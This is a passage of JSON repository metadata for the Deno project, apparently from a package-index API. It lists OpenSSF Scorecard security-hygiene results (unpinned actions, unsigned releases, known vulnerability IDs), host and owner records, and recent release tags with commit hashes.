maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000